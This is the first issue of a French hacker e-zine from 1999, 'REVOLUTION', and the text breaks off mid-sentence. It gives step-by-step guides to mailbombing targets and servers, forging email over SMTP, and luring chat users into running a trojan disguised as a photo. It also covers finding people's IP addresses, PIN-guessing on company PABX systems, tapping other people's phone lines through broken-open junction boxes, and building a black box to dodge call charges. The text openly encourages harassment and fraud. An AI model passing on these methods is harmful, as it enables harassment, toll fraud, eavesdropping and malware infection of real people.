     
  °*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°
 
   ######    ######  #      #    #####   #        #     #  #######  #######   #####   ##     #  
   #     #  #        #      #   #     #  #        #     #     #        #     #     #  # #    #  
   #     #  #         #    #    #     #  #        #     #     #        #     #     #  #  #   #  
   ######    ###      #    #    #     #  #        #     #     #        #     #     #  #   #  #  
   #   #    #          #  #     #     #  #        #     #     #        #     #     #  #    # #  
   #    #   #          #  #     #     #  #        #     #     #        #     #     #  #     ##  
   #     #   ######     ##       #####   #######   #####      #     #######   #####   #      #  

  °*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°        
          COMETE NUMBER ONE                                              SEPTEMBRE 1999


			    		°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°

                                        Edité par Redoxx 

			    		°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°


      °*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°
      ¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤
      °*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°
      ¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤            
      °*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°


			    		°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°

                                            E d i t o 

			    		°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°




	SALUT A TOUS !!!

	Me voici, me voila ! Tout nouveau, tout beau, je suis jeune, et ça se voit ;o)	

	Je m'appelle Redoxx et je suis heureux de vous présenter le fruit de mon travail : la
première comète de REVOLUTION !!!

	Et oui ! Encore un e-zine de plus ! Mais un e-zine pas comme les autres, puisque c'est
le mien ! Nan, en fait, si j'ai décidé d'écrire REVOLUTION, c'est parce que quand je débutais, 
c'était rare que je trouve des gars qui acceptent de m'aider et de m'apprendre quelque chose, 
et la plupart des e-zines où je trouvais étaient trop compliqués pour le petit newbie assoiffé
de connaissances que j'étais :oP

	Je vous avoue que je n'ai jamais écrit pour quelque e-zine que ce soit, et que REVOLUTION
est le premier mag que j'édite, donc soyez indulgents avec moi, d'autant plus que je l'écris
tout seul, donc y'a personne pour m'aider, me corriger si je me trompe ou me donner des idées
si je n'en ai plus. 

	Donc c'est sûr que je suis pas un Mitnick (tant mieux : j'irais pas en tôle ;oP) et que 
REVOLUTION n'est qu'un zine parmi tant d'autres, mais p'tet' que mon zine plaira à certains et 
que je pourrais aider quelques newbies dans leur apprentissage et devenir ainsi un WarLord adulé 
et respecté... Naaannn !!! J'déconne ! C'est pour rire ! Je ne suis qu'un pauvre petit hacker de
merde comparé à un H117, un Cod4 ou un SilkAlien !

	Sinon, j'ai divisé REVOLUTION en quatre parties :	

			* Hacking (pour les petits délinquants du Web) 
			* Phreaking (pour enculer profond  Farce Telecom)
			* Social Engineering (une discipline que j'adore très beaucoup)
			* Divers (arnaques, histoires, délires, bons plans, etc...)


	A part ça, quoi dire d'autre ?

	Ah ! Oui ! Je ne me prends pas au sérieux et tout ce que je dis est à prendre au 128e 
degré, parce que je suis de ceux qui se prennent pas la tête et qui pratiquent l'auto-dérision 
sans se poser de question, et si vous êtes cons et que vous pouvez pas comprendre ça, ben c'est 
dommage pour vous, mais je tiens à vous signaler que je vous pisse à la raie avec une paille de 
50 mètres de long sans toucher les bords :o)

	Vous remarquerez que j'ai décidé de ne pas mettre de disclamerde dans cet e-zine, parce 
que si je suis Hacker, c'est pas pour m'écraser devant quelqu'un, et vu que le hacking est 
illégal, vaut mieux que je me fasse prendre parce que j'ai pas mis de disque à lamer plutôt que 
parce que j'ai hacké un site, nan ? Pis d'façon, un disclamer n'a aucune valeur légale alors...

	Enfin, vous pouvez m'écrire à Redoxx@caramail.com, ou me chercher sur Undernet, ou encore
essayer de me trouver sur le chat Caramail mais c'est pas gagné d'avance, parce que sur ce chat,
j'ai la fâcheuse habitude de changer de pseudo comme de caleçon (c'est à dire toutes les 15 
jours,... Nan ! J'déconne !) et je n'y suis que rarement sous le pseudo de Redoxx.

	Allez, je vais pas m'éterniser 107 ans sur cet édito, parce que je sens que vous êtes 
tous impatients de lire mes articles...

	Donc comme ils disent dans DeathlyBy... 

	GO-GO-GO-GO-GO-GO-GO-GO-GO-GO-GO-GO-GO-GO !!!!!!!





			    		°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°

                                      S o m m a i r e 

			    		°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°



					   °*°*°*°*° HACKING °*°*°*°*°

				  	     Utiliser un MailBomber
				 	    Envoyer un Mail Anonyme
				     		   Les Adresses IP
					   Idée de Hack sur Caramail
				    		 Spoofing sur mIRC


			       	  °*°*°*°*° PHREAKING °*°*°*°*°

					           Les PABXs
				              Le Beige-Boxing
				           Faire une Black-Box
				         Quelques Numéros Utiles


			   	 °*°*°*°*° SOCIAL ENGINEERING °*°*°*°*°

				     	    Introduction au SE
				          Le SE par E-Mails
				        Obtenir un Pass Hotmail
				       Obtenir un Pass Caramail 
			      (+ environ 160 mots de passe Caramail)


				 	 °*°*°*°*° DIVERS °*°*°*°*°

				        La Conscience du Hacker
				           Devenez Faussaire
				       Se Défouler un Bon Coup





			    		°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°

                                        H a c k i n g 

			    		°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°




	°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°
  	   *** UTILISER UN MAILBOMBER ***
	°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°


     Je vous entend déja beugler : "Wouah ! Le bouffon ! Un article sur l'utilisation des 
MailBombers ! Il manquait plus que ça ! Il a dit qu'il commençait bas, mais il avait pas dit 
qu'il commençait sous Terre !!!"... Mais bon, vos critiques, je m'en fous, et moi, vu le nombre 
de types qui me demandent comment on utilise ce genre de programmes, ben je sais que ce sera
utile à pas mal de gens (des newbies et des lamers certes, mais des gens quand même).

*** C'est quoi un MailBomber ? ***

     C'est un programme qui ne sert en fait qu'à emmerder les gens 
(mais si quelqu'un vous fait chier, faut pas vous gêner) en leur envoyant plein de mails à la 
fois (de 1 à autant qu'on veut) avec le nom qu'on veut.


*** Que faut-il mettre dans les cases ? ***

     En ce qui me concerne, le logiciel de MailBombing le plus simple d'utilisation que je 
connaisse est QuickFyre, sans oublier qu'il est très efficace...
     
	Donc vous l'ouvrez et vous remplissez les cases comme suit :

	Target : l'adresse e-mail de votre cible (ex : grosnaze@wanadoo.fr)
	Sender : votre pseudo ou l'adresse e-mail de celui à qui vous voulez faire accuser
	Subject : le sujet de votre (ou plutot vos) e-mail (ex : Gros con !)
	Server : le serveur-mail de votre cible (ex : smtp.wanadoo.fr)
	Copies : le nombre de copies que vous voulez envoyer

     Vous mettez un petit mot dans la grande case, si jamais votre cible ouvre l'un des mails, 
et vous cliquez sur "Mail", et c'est parti !

     Sinon, vous pouvez aussi utiliser un logiciel comme Kaboom!3 : vous l'ouvrez, vous cliquez 
sur "Mailbomber" et vous mettez :

	To : l'adresse e-mail de la cible
	From : votre pseudo ou l'adresse e-mail de celui à qui vous voulez faire accuser
	Server : le serveur que vous voulez utiliser
	Priority : "High" (c'est le meilleur choix)
	Subject : le sujet de votre (ou plutot vos) e-mail
	Message Body : un petit mot si jamais votre cible ouvre l'un des mails

     Maintenant, vous mettez le nombre de messages que vous voulez envoyer à votre cible ou 
cliquez sur "Mail Perpetually" pour envoyer des messages pendant tout votre temps de connection, 
et cliquez sur "Send", et le tour est joué !!!


*** Quelques conseils et remarques ***

     Si vous voulez vraiment faire chier quelqu'un, il faut mailbomber son adresse provider, 
comme ça, si votre cible n'a pas de logiciel comme EreMove, elle est obligée de télécharger les 
mails un par un.

     Maintenant, si vous voulez faire péter la messagerie de quelqu'un et que vous ne connaissez 
qu'une de ses adresses sur un remaileur anonyme (du genre Caramail), renseignez-vous sur la 
capacité individuelle de chaque boîte, et agissez en conséquence.

     Par exemple, sur Caramerde, on a le droit d'utiliser 10 Mo par boîte, donc sachant que 
chaque mail fera un Ko, envoyez-en au moins 15000, histoire d'être sûr que la boîte est bel et
bien niquée.

     Si vous voulez vous assurer de la capacité réelle de chaque boîte (en général, le remaileur
accorde plus de place qu'il ne l'indique), ouvrez en une à cet effet et mailbombez-la.

     Enfin, si vous voulez vraiment faire quelque chose de bien, organisez une grande soirée de
mailbombing avec une cible prédéfinie comme MiKro$oft ou le F-Haine et explosez tout ça à 
plusieurs ; ainsi, votre "force de frappe" sera décuplée et le serveur-cible ne pourra pas gérer
tout les mails reçus et sera complètement naze jusqu'à que les admins remettent tout ça en place,
ce qui mettra, si l'attaque est assez puissante, au moins une bonne quinzaine de jours. 




	°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°
  	  *** ENVOYER UN MAIL ANONYME ***
	°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°


     Envoyer un mail anonyme, c'est hyper simple, mais ça amuse pas mal de monde (y compris moi,
faut pas se mentir).

     Bon, alors la technique qui suit est la technique la plus connue, mais après, je vous 
donnerai une technique bien plus simple mais tout aussi efficace.

     Quoi t'es pas content ? Tu veux la technique la plus simple tout de suite ? Tu veux que je 
te casse la gueule petit con ?

     Bon, allez, ferme ta gueule que je t'explique !

     En fait, le truc consiste à se connecter sur le port 25 d'un serveur SMTP (Simple Mail 
Transfer Protocol), via Telnet, ce qui ne devrait pas être trop dur, même pour toi, petit newbie.

     Tout d'abord, connecte-toi à Telnet en allant sur DOS, et en tapant avec tes petits doigts 
sur les petites touches de ton petit clavier (mais pas trop fort quand même) :

C:\Windows\telnet.exe

     Ensuite essaye (si par miracle tu as réussi l'opération précédente) de te connecter à un 
serveur en tapant (en contrôlant toujours la force de tes puissants muscles) :

smtp.serveur.com
ou
www.serveur.com

     Commence par essayer les providers, et quand t'auras une réponse, ce sera tout bon 
(si t'es arrivé jusque-là, je te félicite, tu es passé au stade de newbie supérieur ! BRAVO !).

     Enfin ! Tu as réussi à te connecter à un serveur ! La vache ! Un vrai 3L1t3 R3b3LzZ de 
l'informatique ! J'aurais jamais cru que t'étais si balèze !!! Bon, arrête de jouir et connecte 
bien tes deux seuls petits neurones ; voilà ce qui va se passer (avec une * devant, c'est ce que 
tu dois taper, et avec un ¤ devant, c'est ce que tu obtiens) :

     Admettons que tu te sois connecté à Club-Internet :

¤ 220 club-internet.fr ESMTP Sendmail 8.8.8/[France Telecom Interactive]; Mon, 26 Jul 1999 

* helo club-internet.fr 

¤ 250 club-internet.fr Hello 98AA25C1.ipt.aol.com [132.124.59.119], pleased to meet you 

* mail from : seketuveu1@seketuveu2.com (ou juste seketuveu1) 

¤ 250 seketamihaseketuveu1@seketamihaseketuveu2.com... Sender ok 

* rcpt to : cible@providerdelacible.fr 

¤ 250 victime@club-internet.fr... Recipient ok 

* data 

¤ 354 Enter mail, end with "." on a line by itself 

* Message pour la cible, avec le point final seul sur une ligne. 

¤ 250 PAA27633 Message accepted for delivery 

* quit 

     Et voilà, c'est fait ! Tu as réussi ta mission, petit Mitnick en puissance ! Bientôt, même 
la NSA aura peur de toi !!! 


     J'ai tout de même quelques remarques à te faire, jeune Chevalier du Net : 

      - Avec le client Telnet de Windows, ce que tu tapes au clavier ne s'affiche pas sur ton 
moniteur giga-futuriste en 16 millions de couleurs, alors mets ton client en mode "écho local", 
et cette astuce d'3L1t3 dU H4Ck1Ng résoudra ton problème ! 

      - Dans l'exemple que j'ai eu la gentillesse de te donner (comme ça, maintenant, on est 
potes et t'as plus envie de crasher mon ordi), j'ai envoyé un mail à un type de Club-Internet 
avec Club-Internet, mais si j'avais voulu le faire à partir de wanadoodou, j'aurais eu en guise 
de réponse : 

505 victime@club-internet.fr... Relaying Denied 

      Et oui, jeune Jedi de l'Internet ! Certains serveurs refusent d'envoyer des mails à 
d'autres personnes qu'à des abonnés chez eux. Et oui, tout le monde n'est pas dévoué à ton 
bonheur, petit adolescent en manque de sensations fortes ! 

      - Comme tu l'as peut-être remarqué plus haut grâce à tes puissants globes occulaires 
dernière génération, quand tu tapes "helo", le serveur te marque ton IP ; elle est donc loggée 
(t'excites pas ! Je traduis : ton IP est enregistrée et elle sera visible dans une des en-têtes 
du mail) donc n'écris pas ensuite à ta victime sous ta véritable identité sans t'être déconnecté 
puis reconnecté sous peine de te faire griller et de te faire repérer en tant que hacker de la
mort hypra-dangereux et qui fait peur à tous les services secrets du monde ;oP 


      Bon, t'es calmé ? 

      Alors je vais recommencer à te parler comme à un être humain digne de ce nom et je vais te
livrer la technique la plus simple qui soit pour envoyer un mail anonyme... 

      En fait, voyez-vous, cher Barnabé (là, les Barnabé vont être surpris ;-P), il suffit 
d'utiliser un MailBomber et de n'envoyer qu'un seul message... Tout con, non ? 




	°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°
  	       *** LES ADRESSES IP ***
	°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°


*** C'est quoi une IP ? ***

      C'est la représentation numérique d'une adresse binaire 32 bits. Elle se présente de la 
manière suivante : xxx.xxx.xxx.xxx, mais comme c'est du 32 bits elle ne pourra pas dépasser 
255.255.255.255. Elle vous est donnée par votre provider, et elle change à chaque connexion 
(IP dynamique).


*** A quoi ça sert ? ***

      Ben globalement, ça sert à pouvoir pénétrer dans une machine, parce qu'on arrive à rien en 
hacking sans l'IP de la cible, à part des techniques comme le MailBombing. 


*** Comment trouver une IP ? ***

      C'est la question qu'on me pose la plus souvent sur les chats. En fait, tout dépend de 
quelle IP on veut trouver, et à qui on a affaire !!!!! 


* Sa propre IP *

      C'est un truc qui peut paraître débile, mais c'est quand même le commencement. Pour 
connaître sa propre IP, on avez deux solutions, sous DOS ou sous Windaube. 

      Sous DOS, tapez C:\windows\winipcfg 

      Sous Windaube, cliquez sur "Démarrer", puis sur "Exécuter", et tapez winipcfg

      Dans les deux cas, vous verrez un tableau apparaître avec diverses info, dont la fameuse
IP de votre bécane. 


* L'IP d'un autre *


-- Sur Caramail --

	Il faut se débrouiller pour que la cible vous envoie un e-mail, et regarder dans les en-
têtes du mail, en cliquant sur "En-têtes" à côté de "Répondre".


-- Sous IRC -- 

      Trouver l'IP d'un mec sous IRC, y'a rien de plus simple : tapez, sous IRC, 
/dns pseudodumec 

-- Sous ICQ -- 

      Il y a deux méthodes, toutes les deux hyper simples : 

      ° Sous ICQ 98 (seulement cette version), allez dans les infos de la cible, mais là, hé-hé, 
son IP est cachée. AHAHAHAHAH !!! Pour remédier à ce "piti" problème, mettez votre ICQ off-line 
(la fleur rouge) et là, MIRACLE !!! Son IP apparaît !!! 

      ° Sous les autres versions d'ICQ, démerdez-vous pour trouver un prog qui trouve l'IP avec 
le numéro ICQ de la cible. Mon préféré est ICQIPsniffer. 

-- En se faisant nuker -- 

      Cette technique est GIGA-MARRANTE mais il vous faut un prog anti-nuke ou un firewall. 

      En fait, le truc, c'est de vous faire passer pour un gros crétin ravagé et de donner votre
propre IP au premier blaireau de lamer qui vous tombera sous la main. Ce débile ne résistera pas 
à la tentation de vous nuker (forcément, pour une fois qu'il peut mettre sa grande science du 
hack que tout le monde lui envie en application), et grâce à votre anti-nuke ou votre firewall, 
rien n'arrivera à votre P.C hormis l'IP du lamer. 


*** IP d'un site ***

      Ce truc est carrément hyper facile ; sous DOS tapez ping -a Adresseduserveur

      Vous aurez alors son IP et la vitesse avec laquelle vous communiquez avec ce site. 




	°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°
  	 *** IDEE DE HACK SUR CARAMAIL ***
	°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°


     Ce qui suit n'est qu'une idée parmi tant d'autres te je ne suis sûrement pas le premier à 
l'avoir eu, mais moi, comme je suis pas con, je dépose un copyright dès maintenant ;o)

      Donc, il va vous falloir :

- Icq 98 (ou 99, avec un scanneur d'IP )

- Adduser (c'est un programme pour ICQ qui permet de mettre quelqu'un sur sa "contact list" sans 
son autorisation.) 

- Un troyen assez récent (les troyens, c'est pour les lamers, mais je m'en pète les couilles 
parce que c'est quand même utile) 

- La photo d'une meuf (si possible la photo d'une copine pour faire plus réel, parce que Tabata 
Cash qui suce Rocco Sifredi, ça fait mytho, quand même) 

- Un compte Cacamail au nom d'une fille bien "attirante" (du style "jf-ch-love-and-sex" ou 
"i-want-a-boy", pas de "cunegonde_la_frustrée" ou de "marie-germaine_la_ campagnarde") 

      Et tant qu'à faire, sniffez-vous avant de faire ça, pour pas vous faire niquer... 

      Vous avez tout le matos ? Kewl ! C'est parti !!!! 

      1°) Go sur caramerde avec votre nouveau compte, et allez sur un salon de discussion du 
style "Sexe & baise". 

      2°) Now, cherchez si il y en a pas qui ont ICQ grace à leurs e-mails, 99% de leurs adresse
e-mails sont pseudo@caramail.com. 

      3°) Grace à "Adduser" mettez-les tous sur votre "contact-list" : ce sont vos cibles 
potentielles. 

      4°) Tenez avec eux un discours du genre : 

Vous : Salut !!!! :-@
Cible : Salut ! ;-)
Vous : Tu m'envoies ta photo stp ? ;-)
Cible : oui / non (rien à battre de la réponse)
Vous : Tu veux ma photo ?
Cible : Oui, ce serait cooooooollllll !!!!

      Gagné ! Héhéhéhéhéhéhé... :oD

      Là vous lui envoyez un fichier sous zip contenant :

- La photo de la meuf
- Le serveur du troyen renomé en "lisez-moi.exe"

      C'est clair, il vous faut un ch'tit' peu de chance pour que la victime marche et 
s'infecte, mais si ça marche, chopez son Ip grâce à Icq (mettez -lz sur "off-line" avec Icq98). 

      Et hop ! Vous êtes averti à chaque fois que votre victime se connecte et autres infos 
utiles. 




	°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°
  	      *** SPOOFING SUR MIRC ***
	°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°


      Pour vous spoofer sur mIRC, ouvrez-le, allez dans "File", puis dans "Options".

      Un menu va alors s'afficher...

      Cliquez sur "Firewall" dans la catégorie "Connect", et cochez "Use SOCKS Firewall" et 
"Socks4" et mettez le hostname du proxy serveur et le port.

      Maintenant, allez dans "Local Info" et mettez encore le même nom à "Local Host" ; ne 
cochez rien d'autre. 

      Maintenant, lancez la connection sur un serveur IRC sur le port 6667.

      Vous allez devoir attendre un peu (c'est un peu long les proxies des fois), mais vous avez 
spoofer votre ip et vous êtes anonyme sur IRC.

      Par contre, il y a des serveurs IRC qui n'acceptent pas les proxies donc vous aurez un 
message de ce genre :

Closing link H4x0rZ [unknown@194.123.123.123] (unauthorized connection)
*** Disconnected

      Il arrive parfois que le proxy déconne un peu et vous déconnecte d'IRC mais ne vous 
inquietez pas, vous ne vous êtes pas fait tracer.

      Il arrive aussi que le proxy ait un problème et vous ne puissiez pas passer par lui. Il 
faudra alors en choisir un autre.

      Voici une liste de proxies que vous pouvez utiliser sur le port 1080 :

            noyan-tapan.am 
            scott.gibbco.com 
            chester.chesterschooldistrict.com 
            cpu2621.adsl.bellglobal.com 
            adsl121ip110.cadvision.com 
            server2.evronet.gr 
            proxy.mercurio.it 
            svr1.macrovision.co.jp 
            ns.eel.co.jp 
            taisvr.taiei.co.jp 
            ns0-gw.nsjnet.co.jp 
            dns.fatwa.gov.kw 
            holmes.intellex.net 
            softclub.rinet.ru 
            gw-2.tatrahome.sk 





			    		°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°

                                      P h r e a k i n g 

			    		°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°




	°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°
  	          *** LES PABXS ***
	°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°


*** Qu'est-ce qu'une PABX ? ***

     C'est un central téléphonique qui gère les appels entrant et sortant à l'intérieur d'une 
entreprise.


*** Comment trouver un numéro de PABX ? ***

     Tout d'abord, il faut savoir que la plupart des numéros de PABX commencent par 0800.

      Ensuite, afin d'être faciles à mémoriser, les chiffres qui suivent le 0800 dans un numéro 
de PABX sont construits selon un schéma, comme par exemple :

0800 ABC ABC (exemples : 0800 650 650, 0800 123 123, etc...)
0800 AB AC AD (exemples : 0800 01 02 03, 0800 65 66 67, etc...)
0800 AB AB AB (exemples : 0800 10 10 10, 0800 55 55 55, etc...)
0800 AB BC CD (exemples : 0800 12 23 34, 0800 98 87 76, etc...)
0800 ABC ABD (exemples : 0800 560 561, 0800 788 789, etc...)

      Des programmes comme Toneloc qui scannent automatiquement les PABX, ce qui évite de se 
faire chier à le faire à la main ; sinon, ben il faut de la patience... ou de la chance ! 

      
*** Comment savoir si vous avez trouver une PABX ? ***

     Bon, admettons que vous ayez trouver un numéro qui débouche quelque part, ce ne sera pas 
forcément une PABX, mais si vous tombez sur un voix électronique qui vous demande d'appuyer sur 
"*" ou "#" puis vous demande un mot de passe, il y a de fortes chances que vous ayez décroché le 
gros lot.


*** Comment trouver le mot de passe ? ***

     Bon, ben ça, c'est un peu au petit bonheur la chance, mais il faut savoir qu'un mot de 
passe sur un serveur de type PABX est généralement un code de 4 chiffres et qu'il y a toujours 
un naze quelque part pour avoir un mot de passe facile à trouver genre :

AAAA --> 0000, 1111, 2222, 3333, etc...
AABB --> 0011, 1122, 5588, 7733, etc...
ABBA --> 0110, 1001, 2552, 9779, etc...
ABCD (dans un ordre chronologique) --> 1234, 3456, 6789, 4567, etc...

      Si ça marche pas, essayez des trucs un peu plus délires du genre 1664, 0666, 0069, etc.

      Et si ça marche toujours pas, ben démerdez-vous ou trouvez une autre PABX :-P


*** Comment se servir d'une PABX ? ***

      Vous avez une PABX et un mot de passe qui va avec ? Et vous savez pas quoi en faire ? 
Z'êtes neuneu ou vous vous foutez de ma gueule ??? Bon, ben voila une petite explication du 
monde d'aventures aux mille embûches dans lequel vous allez entrer...

      Bon, avec @ devant, c'est ce que vous faîtes et avec ¤ devant, c'est la réponse que le 
serveur vocal vous donnera... Au fait, ce n'est qu'un exemple (Quoi ? Vous le saviez ? Ah bon ? 
Pardon... ;-P)

@ 0800 666 666

¤ "Bienvenue sur le service Duschmutz, Dugland, Ducon & Cie, gnagnagna gnagnagna..."

@ # ou * 

¤ "Gnagnagna gnagnagna..., veuillez composer votre mot de passe." 

@ 1664# ou 1664* 

¤ "Gnagnagna gnagnagna..., veuillez composer votre numéro de poste." 

@ 1664# ou 1664* [on s'en fout du numéro de poste, mettez 4 chiffres et basta !] 

¤ "Bienvenue Glandu Number One, gnagnagna gnagnagna, composez le numéro de téléphone de votre 
correspondant précédé d'un zéro et suivi de la touche dièse." 

@ 0 666 1664 666 # 

      Et voila !!! Le tour est joué ! P4bX 1s Own3d ;-P 

      Amusez-vous bien !!!

      


	°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°
  	       *** LE BEIGE-BOXING ***
	°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°


*** C'est quoi le Beige Boxing ? ***

     Globalement, le Beige Boxing consiste à se brancher sur la ligne téléphonique de quelqu'un 
d'autre pour qu'il banque à notre place. ;-P


*** Quel matériel faut-il pour faire du Beige Boxing ? ***

     Bon, ben ça, ça dépend de vous ; mais à la base, il vous faut :

° 4 pinces crocodiles

° du matériel de soudure (de l'étain et un fer) 

° un téléphone normal ou un modem 

° un cutter ou une pince à dénuder

      Maintenant, vous pouvez aussi avoir besoin d'une barre à mine, d'un tournevis, de 
dynamite, etc...

      Et si vous comptez phreaker pendant longtemps, ben je vous conseille d'emmener de la 
bouffe, de la boisson, du bedo, etc...


*** Comment procéder ? ***

     Tout d'abord, coupez le fil au ras de la prise mâle du modem ou du téléphone (selon que 
vous vouliez surfer ou téléphoner) ; normalement, 4 fils devraient apparaître : un jaune, un 
vert, un rouge et un blanc. Si ce n'est pas le cas, il vous faudra chercher les équivalences.

      Une fois la première opération faite, dénudez les fils à l'aide du cutter et soudez les 
chacun à une prise crocodile.

      Maintenant, barrez-vous le plus loin possible de la civilisation (en campagne, on a moins 
de chances de se faire niquer et de se faire tracer) et cherchez une borne Fric Télécon ou un
pylone avec une boîte et défoncez ladite borne ou ledit pylone et vous allez trouver plein de 
trucs dedans, donc 4 fils jaune, vert, rouge et blanc. ;o) 

      Donc là, vous reliez le fil jaune de votre téléphone ou de votre modem au fil jaune de la 
borne, et faites pareil avec le vert, le rouge et le blanc, en faisant toujours correspondre les 
couleurs ; vous devriez alors entendre une tonalité dans votre téléphone. 

      Maintenant, vous pouvez téléphoner, surfer sur Internet ou encore écouter la ligne 
téléphonique de ceux à qui la ligne appartient. Kewl, non ? 


*** Quelques conseils ***

      Ben tout d'abord, juste par respect de l'éthique, préférez vous brancher sur des lignes
d'entreprises plutot que des lignes de particuliers, sauf, bien entendu, si le particulier en 
question est vraiment un gros connard qui vous a fait des crasses... ;-P

      Remarquez, je dis ça et je ne dis rien, parce que si vous pompez la ligne d'un 
particulier, il suffit qu'il porte plainte pour se faire rembourser, mais bon... A vous de 
voir ! 

      Ensuite, vérifiez bien la solidité de vos branchements, parce que ce serait quand même 
dommage si tout partait en couilles au dernier moment ou en pleine discussion. 

      Vous pouvez pomper sur la ligne comme un malade tant que votre généreux donateur (Narf !) 
n'a pas reçu la facture, parce qu'après, vous avez intérêt à laisser au moins une période de 
deux factures (entre 2 et 4 mois suivant les cas) avant de recommencer... Mais recommencez quand 
même !!! ;-D 




	°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°
  	    *** FAIRE UNE BLACK-BOX ***
	°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°


*** C'est quoi une Black-Box ? ***

     Ben en résumant, c'est un montage à faire sur un téléphone qui fait que lorsque quelqu'un 
appelle, il ne paye absolument rien, parce que Fuck Telecom croit que le téléphone n'est pas 
décroché.


*** Et ça ressemble à quoi, une Black-Box ? ***

	Bon, ben je crois qu'un petit schéma s'impose...


____ | = fil électrique
XX = résistance
%% = LED
OOO = interrupteur

NB : les deux fils sont regroupés dans celui du téléphone.


Ligne          { >--------------Fil-Bleu----------------------> } Téléphone
téléphonique     >--------------Fil-Blanc--------------------->
                                  | |
                         |_____XX_____%%____|
                                  | |
                          |_______OOO_______|


      Remarque : sur certains téléphones, les fils peuvent être rouge et vert, dans ce cas il 
faut remplacer le fil blanc par le fil rouge et le fil bleu par le fil vert. 


*** Comment construire une Black-Box ? *** 

     Tout d'abord, il faut découper le fil de son téléphone sans le couper en n'ouvrant que le 
pastique qui englobe les deux fils, de facon à avoir devant les yeux que les deux fils en 
question. 

     Ensuite, il faut prendre le fil blanc, car c'est sur celui-ci qu'on fait le montage, qui 
est un branchement en parallèle. 

     Maintenant, allez chercher votre caisse à outils et vos composants et débrouillez-vous 
comme un grand ! 

     
*** Comment on fait quand le téléphone sonne ? ***

     C'est simple : quand le téléphone sonne, mettez l'interrupteur sur "On", puis décrochez. 
Ainsi, FT croira que vous n'avez toujours pas décroché, alors que vous serez pénard au tel en 
train de vous tapez la discut' ! 

     Sinon, quand vous laissez sur "Off", ben c'est exactement comme un téléphone normal. 

     Voili-voila !!! Bon phreak ! Mais je vous rappelle : faites hyper gaffe, parce que si FT 
vous nique, c'est un procès au cul, et vous êtes sur de le perdre et de vous tapez une putain de 
belle amende, parce que vous paierez aussi pour tous ceux qui se font pas prendre !!!! 

      Et restez pas trop longtemps non plus, parce que c'est le meilleur moyen de vous faire 
choper justement (ben voui, un gars qui attend alors que personne ne répond au bout de 300 
sonneries, ça fait un peu chelou quand même). 




	°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°
  	  *** QUELQUES NUMEROS UTILES ***
	°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°


*** Téléphoner en restant anonyme *** 

      Comme vous le savez, ou peut-être pas, Fric Télécon a mis en vente des téléphones qui 
affichent le numéro de l'appelant... Ben moi, j'aime pô ça ! Parce que pour les attaques au SE 
ou les blagues téléphoniques, ça l'fait carrément pas !

      Donc, pour ceux qui ne le savent pas encore, faîtes le 3651 avant de composer le numéro de 
votre cible (dans le cas du social engineering) ou de votre victime (dans le cas du canular), 
et, si elle est équipée d'un de ces téléphones, elle ne verra pas s'afficher votre numéro de 
téléphone, mais des petites étoiles ! 

      Cette technique s'applique également aux providers (comme ça, on est anonyme, ce qui est 
pratique si votre abonnement est volé ou piraté), ainsi qu'aux VMBs et aux PABXs (c'est plus sûr 
si vous avez la folie d'appeler de chez vous).

      Mais bon, faut pas non plus perdre de vue que dès qu'on fait le 3651, FT nous enregistre 
et nous met dans une liste spéciale, et dès que y'a quelqu'un qui fait une connerie avec les 
téléphones, ben c'est cette liste-là que les employés de Fuck Telecom regardent en premier. 


*** Savoir qui vous a appelé ***

      Si votre téléphone sonne mais que vous ne décrochez pas (si un petit malin s'amuse à vous 
faire chier et que vous avez marre d'entendre ses conneries par exemple), vous pouvez obtenir 
son numéro de téléphone en composant le 3131 ; vous tomberez alors sur une voix qui vous donnera
